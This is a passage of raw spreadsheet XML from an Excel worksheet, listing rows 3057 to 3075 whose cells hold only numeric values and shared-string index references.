      </c>
      <c r="H3057" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3057" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3057" s="12" t="s">
        <v>18372</v>
      </c>
      <c r="K3057" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3057" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3057" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3057" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3057" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3057" s="12" t="s">
        <v>20670</v>
      </c>
      <c r="Q3057" s="12" t="s">
        <v>28317</v>
      </c>
      <c r="R3057" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3057" s="12" t="s">
        <v>20671</v>
      </c>
      <c r="T3057" s="12" t="s">
        <v>19494</v>
      </c>
      <c r="U3057" s="12" t="s">
        <v>20672</v>
      </c>
      <c r="V3057" s="12" t="s">
        <v>18373</v>
      </c>
      <c r="W3057" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3057" s="12">
        <v>3</v>
      </c>
      <c r="Y3057" s="12" t="s">
        <v>20673</v>
      </c>
    </row>
    <row r="3058" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3058" s="12">
        <v>14324</v>
      </c>
      <c r="B3058" s="12" t="s">
        <v>31002</v>
      </c>
      <c r="D3058" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F3058" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3058" s="12" t="s">
        <v>20674</v>
      </c>
      <c r="H3058" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3058" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J3058" s="12" t="s">
        <v>166</v>
      </c>
      <c r="K3058" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3058" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3058" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3058" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3058" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3058" s="12" t="s">
        <v>20571</v>
      </c>
      <c r="Q3058" s="12" t="s">
        <v>28317</v>
      </c>
      <c r="R3058" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3058" s="12" t="s">
        <v>20675</v>
      </c>
      <c r="T3058" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U3058" s="12" t="s">
        <v>20676</v>
      </c>
      <c r="V3058" s="12" t="s">
        <v>167</v>
      </c>
      <c r="W3058" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3058" s="12">
        <v>1</v>
      </c>
      <c r="Y3058" s="12" t="s">
        <v>20677</v>
      </c>
    </row>
    <row r="3059" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3059" s="12">
        <v>14329</v>
      </c>
      <c r="B3059" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3059" s="12" t="s">
        <v>31083</v>
      </c>
      <c r="E3059" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F3059" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3059" s="12" t="s">
        <v>20678</v>
      </c>
      <c r="H3059" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3059" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J3059" s="12" t="s">
        <v>3068</v>
      </c>
      <c r="K3059" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3059" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3059" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3059" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3059" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3059" s="12" t="s">
        <v>20679</v>
      </c>
      <c r="Q3059" s="12" t="s">
        <v>28315</v>
      </c>
      <c r="R3059" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3059" s="12" t="s">
        <v>20680</v>
      </c>
      <c r="T3059" s="12" t="s">
        <v>20681</v>
      </c>
      <c r="U3059" s="12" t="s">
        <v>20682</v>
      </c>
      <c r="V3059" s="12" t="s">
        <v>5765</v>
      </c>
      <c r="W3059" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3059" s="12">
        <v>14</v>
      </c>
      <c r="Y3059" s="12" t="s">
        <v>20683</v>
      </c>
    </row>
    <row r="3060" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3060" s="12">
        <v>14334</v>
      </c>
      <c r="B3060" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3060" s="12" t="s">
        <v>30868</v>
      </c>
      <c r="E3060" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F3060" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3060" s="12" t="s">
        <v>20684</v>
      </c>
      <c r="H3060" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3060" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J3060" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K3060" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3060" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3060" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3060" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3060" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3060" s="12" t="s">
        <v>20685</v>
      </c>
      <c r="Q3060" s="12" t="s">
        <v>28315</v>
      </c>
      <c r="R3060" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3060" s="12" t="s">
        <v>20686</v>
      </c>
      <c r="T3060" s="12" t="s">
        <v>18898</v>
      </c>
      <c r="U3060" s="12" t="s">
        <v>20687</v>
      </c>
      <c r="V3060" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W3060" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3060" s="12">
        <v>99</v>
      </c>
      <c r="Y3060" s="12" t="s">
        <v>20688</v>
      </c>
    </row>
    <row r="3061" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3061" s="12">
        <v>14336</v>
      </c>
      <c r="B3061" s="12" t="s">
        <v>30518</v>
      </c>
      <c r="C3061" s="12" t="s">
        <v>30516</v>
      </c>
      <c r="D3061" s="12" t="s">
        <v>30528</v>
      </c>
      <c r="F3061" s="12" t="s">
        <v>30524</v>
      </c>
      <c r="G3061" s="12" t="s">
        <v>20689</v>
      </c>
      <c r="H3061" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3061" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J3061" s="12" t="s">
        <v>139</v>
      </c>
      <c r="K3061" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3061" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M3061" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N3061" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O3061" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3061" s="12" t="s">
        <v>19482</v>
      </c>
      <c r="Q3061" s="12" t="s">
        <v>28313</v>
      </c>
      <c r="R3061" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3061" s="12" t="s">
        <v>20690</v>
      </c>
      <c r="T3061" s="12" t="s">
        <v>20691</v>
      </c>
      <c r="U3061" s="12" t="s">
        <v>20692</v>
      </c>
      <c r="V3061" s="12" t="s">
        <v>995</v>
      </c>
      <c r="W3061" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3061" s="12">
        <v>9</v>
      </c>
      <c r="Y3061" s="12" t="s">
        <v>20693</v>
      </c>
    </row>
    <row r="3062" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3062" s="12">
        <v>14337</v>
      </c>
      <c r="B3062" s="12" t="s">
        <v>31330</v>
      </c>
      <c r="D3062" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3062" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F3062" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G3062" s="12" t="s">
        <v>20694</v>
      </c>
      <c r="H3062" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3062" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3062" s="12" t="s">
        <v>356</v>
      </c>
      <c r="K3062" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3062" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3062" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3062" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3062" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3062" s="12" t="s">
        <v>20695</v>
      </c>
      <c r="Q3062" s="12" t="s">
        <v>28317</v>
      </c>
      <c r="R3062" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3062" s="12" t="s">
        <v>20696</v>
      </c>
      <c r="T3062" s="12" t="s">
        <v>7589</v>
      </c>
      <c r="U3062" s="12" t="s">
        <v>20697</v>
      </c>
      <c r="V3062" s="12" t="s">
        <v>15191</v>
      </c>
      <c r="W3062" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3062" s="12">
        <v>8</v>
      </c>
      <c r="Y3062" s="12" t="s">
        <v>20698</v>
      </c>
    </row>
    <row r="3063" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3063" s="12">
        <v>14342</v>
      </c>
      <c r="B3063" s="12" t="s">
        <v>30458</v>
      </c>
      <c r="C3063" s="12" t="s">
        <v>30526</v>
      </c>
      <c r="D3063" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3063" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F3063" s="12" t="s">
        <v>30457</v>
      </c>
      <c r="G3063" s="12" t="s">
        <v>20700</v>
      </c>
      <c r="H3063" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3063" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3063" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K3063" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3063" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3063" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3063" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3063" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3063" s="12" t="s">
        <v>20701</v>
      </c>
      <c r="Q3063" s="12" t="s">
        <v>28311</v>
      </c>
      <c r="R3063" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3063" s="12" t="s">
        <v>20702</v>
      </c>
      <c r="T3063" s="12" t="s">
        <v>20174</v>
      </c>
      <c r="U3063" s="12" t="s">
        <v>20703</v>
      </c>
      <c r="V3063" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W3063" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3063" s="12">
        <v>18</v>
      </c>
      <c r="Y3063" s="12" t="s">
        <v>20704</v>
      </c>
    </row>
    <row r="3064" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3064" s="12">
        <v>14351</v>
      </c>
      <c r="B3064" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3064" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E3064" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F3064" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G3064" s="12" t="s">
        <v>20705</v>
      </c>
      <c r="H3064" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3064" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J3064" s="12" t="s">
        <v>9219</v>
      </c>
      <c r="K3064" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3064" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3064" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3064" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3064" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3064" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="Q3064" s="12" t="s">
        <v>28315</v>
      </c>
      <c r="R3064" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3064" s="12" t="s">
        <v>20706</v>
      </c>
      <c r="T3064" s="12" t="s">
        <v>57</v>
      </c>
      <c r="U3064" s="12" t="s">
        <v>20707</v>
      </c>
      <c r="V3064" s="12" t="s">
        <v>6839</v>
      </c>
      <c r="W3064" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3064" s="12">
        <v>3</v>
      </c>
      <c r="Y3064" s="12" t="s">
        <v>20708</v>
      </c>
    </row>
    <row r="3065" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3065" s="12">
        <v>14352</v>
      </c>
      <c r="B3065" s="12" t="s">
        <v>31002</v>
      </c>
      <c r="D3065" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F3065" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3065" s="12" t="s">
        <v>20709</v>
      </c>
      <c r="H3065" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3065" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J3065" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K3065" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3065" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3065" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3065" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3065" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3065" s="12" t="s">
        <v>20695</v>
      </c>
      <c r="Q3065" s="12" t="s">
        <v>28317</v>
      </c>
      <c r="R3065" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3065" s="12" t="s">
        <v>20710</v>
      </c>
      <c r="T3065" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U3065" s="12" t="s">
        <v>20711</v>
      </c>
      <c r="V3065" s="12" t="s">
        <v>10241</v>
      </c>
      <c r="W3065" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3065" s="12">
        <v>3</v>
      </c>
      <c r="Y3065" s="12" t="s">
        <v>20712</v>
      </c>
    </row>
    <row r="3066" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3066" s="12">
        <v>14353</v>
      </c>
      <c r="B3066" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C3066" s="12" t="s">
        <v>28361</v>
      </c>
      <c r="D3066" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E3066" s="12" t="s">
        <v>31431</v>
      </c>
      <c r="F3066" s="12" t="s">
        <v>29728</v>
      </c>
      <c r="G3066" s="12" t="s">
        <v>20713</v>
      </c>
      <c r="H3066" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3066" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J3066" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K3066" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3066" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3066" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3066" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3066" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3066" s="12" t="s">
        <v>20695</v>
      </c>
      <c r="Q3066" s="12" t="s">
        <v>28317</v>
      </c>
      <c r="R3066" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3066" s="12" t="s">
        <v>20714</v>
      </c>
      <c r="T3066" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U3066" s="12" t="s">
        <v>20337</v>
      </c>
      <c r="V3066" s="12" t="s">
        <v>10241</v>
      </c>
      <c r="W3066" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3066" s="12">
        <v>1</v>
      </c>
      <c r="Y3066" s="12" t="s">
        <v>20715</v>
      </c>
    </row>
    <row r="3067" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3067" s="12">
        <v>14354</v>
      </c>
      <c r="B3067" s="12" t="s">
        <v>31325</v>
      </c>
      <c r="C3067" s="12" t="s">
        <v>28414</v>
      </c>
      <c r="D3067" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E3067" s="18" t="s">
        <v>31428</v>
      </c>
      <c r="F3067" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3067" s="12" t="s">
        <v>20716</v>
      </c>
      <c r="H3067" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3067" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J3067" s="12" t="s">
        <v>12555</v>
      </c>
      <c r="K3067" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3067" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3067" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3067" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3067" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3067" s="12" t="s">
        <v>20571</v>
      </c>
      <c r="Q3067" s="12" t="s">
        <v>28317</v>
      </c>
      <c r="R3067" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3067" s="12" t="s">
        <v>20717</v>
      </c>
      <c r="T3067" s="12" t="s">
        <v>20718</v>
      </c>
      <c r="U3067" s="12" t="s">
        <v>20719</v>
      </c>
      <c r="V3067" s="12" t="s">
        <v>13296</v>
      </c>
      <c r="W3067" s="12" t="s">
        <v>20720</v>
      </c>
      <c r="X3067" s="12">
        <v>186</v>
      </c>
      <c r="Y3067" s="12" t="s">
        <v>20721</v>
      </c>
    </row>
    <row r="3068" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3068" s="12">
        <v>14355</v>
      </c>
      <c r="B3068" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3068" s="12" t="s">
        <v>30868</v>
      </c>
      <c r="E3068" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F3068" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3068" s="12" t="s">
        <v>20722</v>
      </c>
      <c r="H3068" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3068" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3068" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K3068" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3068" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3068" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3068" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3068" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3068" s="12" t="s">
        <v>20723</v>
      </c>
      <c r="Q3068" s="12" t="s">
        <v>28315</v>
      </c>
      <c r="R3068" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3068" s="12" t="s">
        <v>20724</v>
      </c>
      <c r="T3068" s="12" t="s">
        <v>2988</v>
      </c>
      <c r="U3068" s="12" t="s">
        <v>20725</v>
      </c>
      <c r="V3068" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W3068" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3068" s="12">
        <v>10</v>
      </c>
      <c r="Y3068" s="12" t="s">
        <v>20726</v>
      </c>
    </row>
    <row r="3069" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3069" s="12">
        <v>14363</v>
      </c>
      <c r="B3069" s="12" t="s">
        <v>30596</v>
      </c>
      <c r="C3069" s="12" t="s">
        <v>28439</v>
      </c>
      <c r="D3069" s="12" t="s">
        <v>30597</v>
      </c>
      <c r="E3069" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F3069" s="12" t="s">
        <v>30594</v>
      </c>
      <c r="G3069" s="12" t="s">
        <v>20727</v>
      </c>
      <c r="H3069" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3069" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3069" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K3069" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3069" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3069" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3069" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3069" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3069" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="Q3069" s="12" t="s">
        <v>28315</v>
      </c>
      <c r="R3069" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3069" s="12" t="s">
        <v>20728</v>
      </c>
      <c r="T3069" s="12" t="s">
        <v>18807</v>
      </c>
      <c r="U3069" s="12" t="s">
        <v>20729</v>
      </c>
      <c r="V3069" s="12" t="s">
        <v>2034</v>
      </c>
      <c r="W3069" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3069" s="12">
        <v>0</v>
      </c>
      <c r="Y3069" s="12" t="s">
        <v>20730</v>
      </c>
    </row>
    <row r="3070" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3070" s="12">
        <v>14364</v>
      </c>
      <c r="B3070" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3070" s="12" t="s">
        <v>30408</v>
      </c>
      <c r="F3070" s="12" t="s">
        <v>30408</v>
      </c>
      <c r="G3070" s="12" t="s">
        <v>20731</v>
      </c>
      <c r="H3070" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3070" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3070" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K3070" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3070" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3070" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3070" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3070" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3070" s="12" t="s">
        <v>20732</v>
      </c>
      <c r="Q3070" s="12" t="s">
        <v>28315</v>
      </c>
      <c r="R3070" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3070" s="12" t="s">
        <v>20733</v>
      </c>
      <c r="T3070" s="12" t="s">
        <v>20734</v>
      </c>
      <c r="U3070" s="12" t="s">
        <v>20735</v>
      </c>
      <c r="V3070" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W3070" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3070" s="12">
        <v>7</v>
      </c>
      <c r="Y3070" s="12" t="s">
        <v>20736</v>
      </c>
    </row>
    <row r="3071" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3071" s="12">
        <v>14372</v>
      </c>
      <c r="B3071" s="12" t="s">
        <v>28354</v>
      </c>
      <c r="D3071" s="12" t="s">
        <v>30466</v>
      </c>
      <c r="F3071" s="12" t="s">
        <v>30481</v>
      </c>
      <c r="G3071" s="12" t="s">
        <v>20737</v>
      </c>
      <c r="H3071" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3071" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J3071" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K3071" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3071" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3071" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3071" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3071" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3071" s="12" t="s">
        <v>20738</v>
      </c>
      <c r="Q3071" s="12" t="s">
        <v>28317</v>
      </c>
      <c r="R3071" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3071" s="12" t="s">
        <v>20739</v>
      </c>
      <c r="T3071" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U3071" s="12" t="s">
        <v>20740</v>
      </c>
      <c r="V3071" s="12" t="s">
        <v>4689</v>
      </c>
      <c r="W3071" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3071" s="12">
        <v>15</v>
      </c>
      <c r="Y3071" s="12" t="s">
        <v>20741</v>
      </c>
    </row>
    <row r="3072" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3072" s="12">
        <v>14373</v>
      </c>
      <c r="B3072" s="12" t="s">
        <v>30518</v>
      </c>
      <c r="C3072" s="12" t="s">
        <v>30516</v>
      </c>
      <c r="D3072" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F3072" s="12" t="s">
        <v>30546</v>
      </c>
      <c r="G3072" s="12" t="s">
        <v>14538</v>
      </c>
      <c r="H3072" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3072" s="12" t="s">
        <v>925</v>
      </c>
      <c r="J3072" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K3072" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3072" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3072" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3072" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3072" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3072" s="12" t="s">
        <v>20571</v>
      </c>
      <c r="Q3072" s="12" t="s">
        <v>28317</v>
      </c>
      <c r="R3072" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3072" s="12" t="s">
        <v>20742</v>
      </c>
      <c r="T3072" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U3072" s="12" t="s">
        <v>20743</v>
      </c>
      <c r="V3072" s="12" t="s">
        <v>3883</v>
      </c>
      <c r="W3072" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3072" s="12">
        <v>4</v>
      </c>
      <c r="Y3072" s="12" t="s">
        <v>20744</v>
      </c>
    </row>
    <row r="3073" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3073" s="12">
        <v>14374</v>
      </c>
      <c r="B3073" s="12" t="s">
        <v>31002</v>
      </c>
      <c r="D3073" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3073" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F3073" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3073" s="12" t="s">
        <v>20745</v>
      </c>
      <c r="H3073" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3073" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3073" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K3073" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3073" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3073" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3073" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3073" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3073" s="12" t="s">
        <v>20746</v>
      </c>
      <c r="Q3073" s="12" t="s">
        <v>28317</v>
      </c>
      <c r="R3073" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3073" s="12" t="s">
        <v>20747</v>
      </c>
      <c r="T3073" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U3073" s="12" t="s">
        <v>20748</v>
      </c>
      <c r="V3073" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W3073" s="12">
        <v>14309</v>
      </c>
      <c r="X3073" s="12">
        <v>3</v>
      </c>
      <c r="Y3073" s="12" t="s">
        <v>20749</v>
      </c>
    </row>
    <row r="3074" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3074" s="12">
        <v>14376</v>
      </c>
      <c r="B3074" s="12" t="s">
        <v>30804</v>
      </c>
      <c r="C3074" s="12" t="s">
        <v>30805</v>
      </c>
      <c r="D3074" s="12" t="s">
        <v>30800</v>
      </c>
      <c r="E3074" s="12" t="s">
        <v>31425</v>
      </c>
      <c r="F3074" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3074" s="12" t="s">
        <v>20750</v>
      </c>
      <c r="H3074" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3074" s="12" t="s">
        <v>14196</v>
      </c>
      <c r="J3074" s="12" t="s">
        <v>14197</v>
      </c>
      <c r="K3074" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3074" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3074" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3074" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3074" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3074" s="12" t="s">
        <v>20751</v>
      </c>
      <c r="Q3074" s="12" t="s">
        <v>28315</v>
      </c>
      <c r="R3074" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3074" s="12" t="s">
        <v>20752</v>
      </c>
      <c r="T3074" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U3074" s="12" t="s">
        <v>20753</v>
      </c>
      <c r="V3074" s="12" t="s">
        <v>14432</v>
      </c>
      <c r="W3074" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3074" s="12">
        <v>3</v>
      </c>
      <c r="Y3074" s="12" t="s">
        <v>20754</v>
      </c>
    </row>
    <row r="3075" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3075" s="12">
        <v>14377</v>
      </c>
      <c r="B3075" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3075" s="12" t="s">
        <v>30174</v>
      </c>
      <c r="F3075" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3075" s="12" t="s">
        <v>20755</v>
      </c>
      <c r="H3075" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3075" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J3075" s="12" t="s">
        <v>3174</v>
      </c>
